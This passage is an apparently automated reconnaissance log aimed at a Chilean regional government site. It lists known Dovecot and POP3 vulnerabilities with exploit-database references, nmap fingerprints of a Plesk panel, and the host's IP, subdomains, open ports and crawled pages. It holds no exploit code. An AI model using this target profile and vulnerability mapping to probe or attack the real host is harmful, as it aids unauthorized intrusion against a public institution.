13433| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
13434| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
13435| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
13436| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
13437| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
13438| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
13439| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
13440| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
13441| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
13442| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
13443| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
13444| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
13445| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
13446| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
13447| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
13448| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
13449|
13450| SecurityFocus - https://www.securityfocus.com/bid/:
13451| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
13452| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
13453| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
13454| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
13455| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
13456| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
13457| [67306] Dovecot Denial of Service Vulnerability
13458| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
13459| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
13460| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
13461| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
13462| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
13463| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
13464| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
13465| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
13466| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
13467| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
13468| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
13469| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
13470| [39838] tpop3d Remote Denial of Service Vulnerability
13471| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
13472| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
13473| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
13474| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
13475| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
13476| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
13477| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
13478| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
13479| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
13480| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
13481| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
13482| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
13483| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
13484| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
13485| [17961] Dovecot Remote Information Disclosure Vulnerability
13486| [16672] Dovecot Double Free Denial of Service Vulnerability
13487| [8495] akpop3d User Name SQL Injection Vulnerability
13488| [8473] Vpop3d Remote Denial Of Service Vulnerability
13489| [3990] ZPop3D Bad Login Logging Failure Vulnerability
13490| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
13491|
13492| IBM X-Force - https://exchange.xforce.ibmcloud.com:
13493| [86382] Dovecot POP3 Service denial of service
13494| [84396] Dovecot IMAP APPEND denial of service
13495| [80453] Dovecot mail-search.c denial of service
13496| [71354] Dovecot SSL Common Name (CN) weak security
13497| [67675] Dovecot script-login security bypass
13498| [67674] Dovecot script-login directory traversal
13499| [67589] Dovecot header name denial of service
13500| [63267] Apple Mac OS X Dovecot information disclosure
13501| [62340] Dovecot mailbox security bypass
13502| [62339] Dovecot IMAP or POP3 denial of service
13503| [62256] Dovecot mailbox security bypass
13504| [62255] Dovecot ACL entry security bypass
13505| [60639] Dovecot ACL plugin weak security
13506| [57267] Apple Mac OS X Dovecot Kerberos security bypass
13507| [56763] Dovecot header denial of service
13508| [54363] Dovecot base_dir privilege escalation
13509| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
13510| [46323] Dovecot dovecot.conf information disclosure
13511| [46227] Dovecot message parsing denial of service
13512| [45669] Dovecot ACL mailbox security bypass
13513| [45667] Dovecot ACL plugin rights security bypass
13514| [41085] Dovecot TAB characters authentication bypass
13515| [41009] Dovecot mail_extra_groups option unauthorized access
13516| [39342] Dovecot LDAP auth cache configuration security bypass
13517| [35767] Dovecot ACL plugin security bypass
13518| [34082] Dovecot mbox-storage.c directory traversal
13519| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
13520| [26578] Cyrus IMAP pop3d buffer overflow
13521| [26536] Dovecot IMAP LIST information disclosure
13522| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
13523| [24709] Dovecot APPEND command denial of service
13524| [13018] akpop3d authentication code SQL injection
13525| [7345] Slackware Linux imapd and ipop3d core dump
13526| [6269] imap, ipop2d and ipop3d buffer overflows
13527| [5923] Linuxconf vpop3d symbolic link
13528| [4918] IPOP3D, Buffer overflow attack
13529| [1560] IPOP3D, user login successful
13530| [1559] IPOP3D user login to remote host successful
13531| [1525] IPOP3D, user logout
13532| [1524] IPOP3D, user auto-logout
13533| [1523] IPOP3D, user login failure
13534| [1522] IPOP3D, brute force attack
13535| [1521] IPOP3D, user kiss of death logout
13536| [418] pop3d mktemp creates insecure temporary files
13537|
13538| Exploit-DB - https://www.exploit-db.com:
13539| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
13540| [23053] Vpop3d Remote Denial of Service Vulnerability
13541| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
13542| [11893] tPop3d 1.5.3 DoS
13543| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
13544| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
13545| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
13546| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
13547|
13548| OpenVAS (Nessus) - http://www.openvas.org:
13549| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
13550| [901025] Dovecot Version Detection
13551| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
13552| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
13553| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
13554| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
13555| [870607] RedHat Update for dovecot RHSA-2011:0600-01
13556| [870471] RedHat Update for dovecot RHSA-2011:1187-01
13557| [870153] RedHat Update for dovecot RHSA-2008:0297-02
13558| [863272] Fedora Update for dovecot FEDORA-2011-7612
13559| [863115] Fedora Update for dovecot FEDORA-2011-7258
13560| [861525] Fedora Update for dovecot FEDORA-2007-664
13561| [861394] Fedora Update for dovecot FEDORA-2007-493
13562| [861333] Fedora Update for dovecot FEDORA-2007-1485
13563| [860845] Fedora Update for dovecot FEDORA-2008-9202
13564| [860663] Fedora Update for dovecot FEDORA-2008-2475
13565| [860169] Fedora Update for dovecot FEDORA-2008-2464
13566| [860089] Fedora Update for dovecot FEDORA-2008-9232
13567| [840950] Ubuntu Update for dovecot USN-1295-1
13568| [840668] Ubuntu Update for dovecot USN-1143-1
13569| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
13570| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
13571| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
13572| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
13573| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
13574| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
13575| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
13576| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
13577| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
13578| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
13579| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
13580| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
13581| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
13582| [70259] FreeBSD Ports: dovecot
13583| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
13584| [66522] FreeBSD Ports: dovecot
13585| [65010] Ubuntu USN-838-1 (dovecot)
13586| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
13587| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
13588| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
13589| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
13590| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
13591| [62854] FreeBSD Ports: dovecot-managesieve
13592| [61916] FreeBSD Ports: dovecot
13593| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
13594| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
13595| [60528] FreeBSD Ports: dovecot
13596| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
13597| [60089] FreeBSD Ports: dovecot
13598| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
13599| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
13600|
13601| SecurityTracker - https://www.securitytracker.com:
13602| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
13603| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
13604| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
13605|
13606| OSVDB - http://www.osvdb.org:
13607| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
13608| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
13609| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
13610| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
13611| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
13612| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
13613| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
13614| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
13615| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
13616| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
13617| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
13618| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
13619| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
13620| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
13621| [66113] Dovecot Mail Root Directory Creation Permission Weakness
13622| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
13623| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
13624| [66110] Dovecot Multiple Unspecified Buffer Overflows
13625| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
13626| [64783] Dovecot E-mail Message Header Unspecified DoS
13627| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
13628| [62796] Dovecot mbox Format Email Header Handling DoS
13629| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
13630| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
13631| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
13632| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
13633| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
13634| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
13635| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
13636| [43137] Dovecot mail_extra_groups Symlink File Manipulation
13637| [42979] Dovecot passdbs Argument Injection Authentication Bypass
13638| [39876] Dovecot LDAP Auth Cache Security Bypass
13639| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
13640| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
13641| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
13642| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
13643| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
13644| [23281] Dovecot imap/pop3-login dovecot-auth DoS
13645| [23280] Dovecot Malformed APPEND Command DoS
13646| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
13647| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
13648| [5857] Linux pop3d Arbitrary Mail File Access
13649| [2471] akpop3d username SQL Injection
13650|_
136518443/tcp open ssl/https-alt sw-cp-server
13652| fingerprint-strings:
13653| GetRequest:
13654| HTTP/1.1 200 OK
13655| Server: sw-cp-server
13656| Date: Thu, 12 Mar 2020 20:36:31 GMT
13657| Content-Type: text/html; charset=UTF-8
13658| Connection: close
13659| Expires: Fri, 28 May 1999 00:00:00 GMT
13660| Last-Modified: Thu, 12 Mar 2020 20:36:31 GMT
13661| Cache-Control: no-store, no-cache, must-revalidate
13662| Cache-Control: post-check=0, pre-check=0
13663| Pragma: no-cache
13664| P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
13665| X-Frame-Options: SAMEORIGIN
13666| X-XSS-Protection: 1; mode=block
13667| <html><head>
13668| <meta charset="utf-8">
13669| <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
13670| <meta name="plesk-build" content="1800200215.00">
13671| <title>Plesk Obsidian 18.0.24</title>
13672| <script language="javascript" type="text/javascript" src="/cp/javascript/externals/prototype.js?1581675273"/></script>
13673| </head><body onLoad=";top.location='/login.php?success_redirect_url=%2F';"></b
13674| HTTPOptions:
13675| HTTP/1.1 405 Not Allowed
13676| Server: sw-cp-server
13677| Date: Thu, 12 Mar 2020 20:36:33 GMT
13678| Content-Type: text/html
13679| Content-Length: 929
13680| Connection: close
13681| ETag: "5e46d8aa-3a1"
13682| <!DOCTYPE html>
13683| <html lang="en" dir="ltr">
13684| <head>
13685| <meta charset="utf-8">
13686| <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
13687| <title>405 Method Not Allowed</title>
13688| <link rel="shortcut icon" href="/favicon.ico">
13689| <link rel="stylesheet" href="/ui-library/plesk-ui-library.css?3.5.0">
13690| <script type="text/javascript" src="/ui-library/plesk-ui-library.min.js?3.5.0"></script>
13691| <script type="text/javascript" src="/cp/javascript/vendors.js"></script>
13692| <script type="text/javascript" src="/cp/javascript/main.js"></script>
13693| <script type="text/javascript" src="/error_docs/uat.js?v1"></script>
13694| <link href="/error_docs/app.css" rel="stylesheet"></head>
13695| <body>
13696|_ <div id="
13697|_http-server-header: sw-cp-server
136982 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
13699==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
13700SF-Port53-TCP:V=7.80%I=7%D=3/12%Time=5E6A9D50%P=x86_64-pc-linux-gnu%r(DNSV
13701SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
13702SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\
13703SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
13704==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
13705SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=3/12%Time=5E6A9D54%P=x86_64-pc-linux-gn
13706SF:u%r(GetRequest,689,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20sw-cp-server\r
13707SF:\nDate:\x20Thu,\x2012\x20Mar\x202020\x2020:36:31\x20GMT\r\nContent-Type
13708SF::\x20text/html;\x20charset=UTF-8\r\nConnection:\x20close\r\nExpires:\x2
13709SF:0Fri,\x2028\x20May\x201999\x2000:00:00\x20GMT\r\nLast-Modified:\x20Thu,
13710SF:\x2012\x20Mar\x202020\x2020:36:31\x20GMT\r\nCache-Control:\x20no-store,
13711SF:\x20no-cache,\x20must-revalidate\r\nCache-Control:\x20post-check=0,\x20
13712SF:pre-check=0\r\nPragma:\x20no-cache\r\nP3P:\x20CP=\"NON\x20COR\x20CURa\x
13713SF:20ADMa\x20OUR\x20NOR\x20UNI\x20COM\x20NAV\x20STA\"\r\nX-Frame-Options:\
13714SF:x20SAMEORIGIN\r\nX-XSS-Protection:\x201;\x20mode=block\r\n\r\n\n\x20\x2
13715SF:0\x20\x20\x20\x20\x20\x20<html><head>\n\x20\x20\x20\x20\x20\x20\x20\x20
13716SF:<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20h
13717SF:ttp-equiv=\"X-UA-Compatible\"\x20content=\"IE=edge,chrome=1\">\n\x20\x2
13718SF:0\x20\x20\x20\x20\x20\x20<meta\x20name=\"plesk-build\"\x20content=\"180
13719SF:0200215\.00\">\n\x20\x20\x20\x20\x20\x20\x20\x20<title>Plesk\x20Obsidia
13720SF:n\x2018\.0\.24</title>\n\x20\x20\x20\x20\x20\x20\x20\x20<script\x20lang
13721SF:uage=\"javascript\"\x20type=\"text/javascript\"\x20src=\"/cp/javascript
13722SF:/externals/prototype\.js\?1581675273\"/></script>\n\x20\x20\x20\x20\x20
13723SF:\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20</head><body\x20onLoad=\"
13724SF:;top\.location='/login\.php\?success_redirect_url=%2F';\"></b")%r(HTTPO
13725SF:ptions,44F,"HTTP/1\.1\x20405\x20Not\x20Allowed\r\nServer:\x20sw-cp-serv
13726SF:er\r\nDate:\x20Thu,\x2012\x20Mar\x202020\x2020:36:33\x20GMT\r\nContent-
13727SF:Type:\x20text/html\r\nContent-Length:\x20929\r\nConnection:\x20close\r\
13728SF:nETag:\x20\"5e46d8aa-3a1\"\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"e
13729SF:n\"\x20dir=\"ltr\">\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\"
13730SF:>\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=device
13731SF:-width,\x20initial-scale=1,\x20shrink-to-fit=no\">\n\x20\x20\x20\x20<ti
13732SF:tle>405\x20Method\x20Not\x20Allowed</title>\n\x20\x20\x20\x20<link\x20r
13733SF:el=\"shortcut\x20icon\"\x20href=\"/favicon\.ico\">\n\x20\x20\x20\x20<li
13734SF:nk\x20rel=\"stylesheet\"\x20href=\"/ui-library/plesk-ui-library\.css\?3
13735SF:\.5\.0\">\n\x20\x20\x20\x20<script\x20type=\"text/javascript\"\x20src=\
13736SF:"/ui-library/plesk-ui-library\.min\.js\?3\.5\.0\"></script>\n\x20\x20\x
13737SF:20\x20<script\x20type=\"text/javascript\"\x20src=\"/cp/javascript/vendo
13738SF:rs\.js\"></script>\n\x20\x20\x20\x20<script\x20type=\"text/javascript\"
13739SF:\x20src=\"/cp/javascript/main\.js\"></script>\n\x20\x20\x20\x20<script\
13740SF:x20type=\"text/javascript\"\x20src=\"/error_docs/uat\.js\?v1\"></script
13741SF:>\n<link\x20href=\"/error_docs/app\.css\"\x20rel=\"stylesheet\"></head>
13742SF:\n<body>\n<div\x20id=\"");
13743Service Info: Host: plesk.tdata.cloud
13744####################################################################################################################################
13745[INFO] ------TARGET info------
13746[*] TARGET: https://www.dellibertador.cl/d3/
13747[*] TARGET IP: 200.54.230.247
13748[INFO] NO load balancer detected for www.dellibertador.cl...
13749[*] DNS servers: dellibertador.cl.
13750[*] TARGET server: nginx
13751[*] CC: CL
13752[*] Country: Chile
13753[*] RegionCode: RM
13754[*] RegionName: Santiago Metropolitan
13755[*] City: Santiago
13756[*] ASN: AS16629
13757[*] BGP_PREFIX: 200.54.0.0/16
13758[*] ISP: CTC. CORP S.A. (TELEFONICA EMPRESAS), CL
13759[INFO] SSL/HTTPS certificate detected
13760[*] Issuer: issuer=C = US, O = Let's Encrypt, CN = Let's Encrypt Authority X3
13761[*] Subject: subject=CN = dellibertador.cl
13762[ALERT] Let's Encrypt is commonly used for Phishing
13763[INFO] DNS enumeration:
13764[*] ftp.dellibertador.cl dellibertador.cl. 200.54.230.247
13765[*] mail.dellibertador.cl 200.54.230.247
13766[*] webmail.dellibertador.cl 200.54.230.247
13767[INFO] Possible abuse mails are:
13768[*] abuse@dellibertador.cl
13769[*] abuse@internetempresas.cl
13770[*] abuse@www.dellibertador.cl
13771[INFO] NO PAC (Proxy Auto Configuration) file FOUND
13772[INFO] Starting FUZZing in http://www.dellibertador.cl/FUzZzZzZzZz...
13773[INFO] Status code Folders
13774[ALERT] Look in the source code. It may contain passwords
13775[INFO] Links found from https://www.dellibertador.cl/d3/ http://200.54.230.247/:
13776[*] https://docs.plesk.com/en-US/obsidian/
13777[*] https://es-la.facebook.com/intendencia.ohiggins.9
13778[*] https://support.plesk.com/hc/en-us
13779[*] https://talk.plesk.com/
13780[*] https://twitter.com/intendenciaLBO
13781[*] https://www.dellibertador.cl/d3
13782[*] https://www.dellibertador.cl/d3/
13783[*] https://www.dellibertador.cl/d3/component/content/article/1
13784[*] https://www.dellibertador.cl/d3/consejo-regional/comisiones
13785[*] https://www.dellibertador.cl/d3/consejo-regional/consejeros-regionales
13786[*] https://www.dellibertador.cl/d3/consejo-regional/funciones-del-consejo-regional
13787[*] https://www.dellibertador.cl/d3/consejo-regional/que-es-el-consejo-regional
13788[*] https://www.dellibertador.cl/d3/consejo-regional/secretaria-ejecutiva
13789[*] https://www.dellibertador.cl/d3/fndr/6-cultura-deporte-seguridad
13790[*] https://www.dellibertador.cl/d3/fndr/chatarrizacion
13791[*] https://www.dellibertador.cl/d3/fndr/fic
13792[*] https://www.dellibertador.cl/d3/fndr/fril
13793[*] https://www.dellibertador.cl/d3/?format=feed&type=atom
13794[*] https://www.dellibertador.cl/d3/?format=feed&type=rss
13795[*] https://www.dellibertador.cl/d3/gobierno-regional/antecedentes-generales
13796[*] https://www.dellibertador.cl/d3/gobierno-regional/funciones-y-atribuciones
13797[*] https://www.dellibertador.cl/d3/gobierno-regional/organigrama
13798[*] https://www.dellibertador.cl/d3/gobierno-regional/sagore
13799[*] https://www.dellibertador.cl/d3/images/docs/2020/fondo_presidente.pdf
13800[*] https://www.dellibertador.cl/d3/images/docs/2020/plan_recursos_hidricos_2020–2029.pdf
13801[*] https://www.dellibertador.cl/d3/intendente
13802[*] https://www.dellibertador.cl/d3/inversion-regional/anteproyecto-regional-de-inversiones-ari
13803[*] https://www.dellibertador.cl/d3/inversion-regional/programa-publico-de-inversiones-regionales-propir
13804[*] https://www.dellibertador.cl/d3/inversion-regional/terminologia-inversion-publica
13805[*] https://www.dellibertador.cl/d3/#modal_5e6a9259f2f486915
13806[*] https://www.dellibertador.cl/d3/noticias/noticias-gore
13807[*] https://www.dellibertador.cl/d3/noticias/noticias-gore/82-intendente-masferrer-participa-en-videoconferencia-del-presidente-pinera-con-intendentes-de-todo-chile-por-coronavirus
13808[*] https://www.dellibertador.cl/d3/noticias/noticias-gore/83-liderados-por-salud-refuerzan-trabajo-intersectorial-para-enfrentar-el-coronavirus-en-la-region-de-o-higgins
13809[*] https://www.dellibertador.cl/d3/noticias/noticias-gore/84-gobierno-regional-confirma-continuidad-de-programa-de-intervencion-de-caderas
13810[*] https://www.dellibertador.cl/d3/noticias/noticias-gore/85-gobierno-regional-aprueba-recursos-para-importantes-proyectos-en-nancagua-san-vicente-y-rancagua
13811[*] https://www.dellibertador.cl/d3/noticias/noticias-gore/86-o-higgins-uso-de-dron-permitio-desbaratar-banda-de-traficantes-e-incautar-29-armas-de-fuego
13812[*] https://www.dellibertador.cl/d3/region
13813[*] https://www.dellibertador.cl/d3/transparencia
13814[*] https://www.facebook.com/Plesk
13815[*] https://www.gob.cl/agendasocial/
13816[*] https://www.instagram.com/intendencia.ohiggins/
13817[*] https://www.leylobby.gob.cl/instituciones/AB082
13818[*] https://www.plesk.com/
13819[*] https://www.plesk.com/blog/
13820[*] https://www.plesk.com/blog/business-industry/whats-control-panel-all-you-need-to-know/
13821[*] https://www.portaltransparencia.cl/PortalPdT/pdtta?codOrganismo=AB082
13822[*] https://www.portaltransparencia.cl/PortalPdT/web/guest/directorio-de-organismos-regulados?p_p_id=pdtorganismos_WAR_pdtorganismosportlet&orgcode=99c759f4a64f4316883cb105c85a8fd6
13823[*] https://www.youtube.com/channel/UCeU-_6YHGQFcVSHLbEXLNlA/playlists
13824[*] http://www.youtube.com/user/tvohiggins
13825cut: intervalle de champ incorrecte
13826Saisissez « cut --help » pour plus d'informations.
13827[INFO] BING shows 200.54.230.247 is shared with 4,040 hosts/vhosts
13828[INFO] Shodan detected the following opened ports on 200.54.230.247:
13829[*] 1
13830[*] 110
13831[*] 143
13832[*] 21
13833[*] 214
13834[*] 22
13835[*] 25
13836[*] 4
13837[*] 443
13838[*] 465
13839[*] 53
13840[*] 587
13841[*] 8
13842[*] 80
13843[*] 8443
13844[*] 8880
13845[*] 993
13846[*] 995
13847[INFO] ------VirusTotal SECTION------
13848[INFO] VirusTotal passive DNS only stores address records. The following domains resolved to the given IP address:
13849[INFO] Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset:
13850[INFO] Latest files that are not detected by any antivirus solution and were downloaded by VirusTotal from the IP address provided:
13851[INFO] ------Alexa Rank SECTION------
13852[INFO] Percent of Visitors Rank in Country:
13853[INFO] Percent of Search Traffic:
13854[INFO] Percent of Unique Visits:
13855[INFO] Total Sites Linking In:
13856[*] Total Sites
13857[INFO] Useful links related to www.dellibertador.cl - 200.54.230.247:
13858[*] https://www.virustotal.com/pt/ip-address/200.54.230.247/information/
13859[*] https://www.hybrid-analysis.com/search?host=200.54.230.247
13860[*] https://www.shodan.io/host/200.54.230.247
13861[*] https://www.senderbase.org/lookup/?search_string=200.54.230.247
13862[*] https://www.alienvault.com/open-threat-exchange/ip/200.54.230.247
13863[*] http://pastebin.com/search?q=200.54.230.247
